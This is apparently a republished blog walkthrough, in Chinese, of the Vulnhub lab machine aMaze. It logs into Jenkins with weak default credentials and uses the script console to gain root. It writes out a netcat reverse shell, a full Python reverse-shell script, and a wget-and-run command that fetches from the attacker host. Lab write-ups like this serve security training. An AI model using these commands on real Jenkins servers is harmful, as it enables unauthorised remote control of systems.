Vulnhub靶机:aMaze

发布时间:2024年01月10日

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

在这里插入图片描述

80端口使用dirsearch爆破目录,发现一个登录界面

在这里插入图片描述

在这里插入图片描述

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面

在这里插入图片描述
在这里插入图片描述

三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

在这里插入图片描述

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

println "whoami".execute().text

在这里插入图片描述

使用nc反弹shell成功,root权限

println "nc -e /bin/bash 10.0.2.15 8888".execute().text

在这里插入图片描述

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

在这里插入图片描述

文章来源:https://blog.csdn.net/qq_48904485/article/details/135443920
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。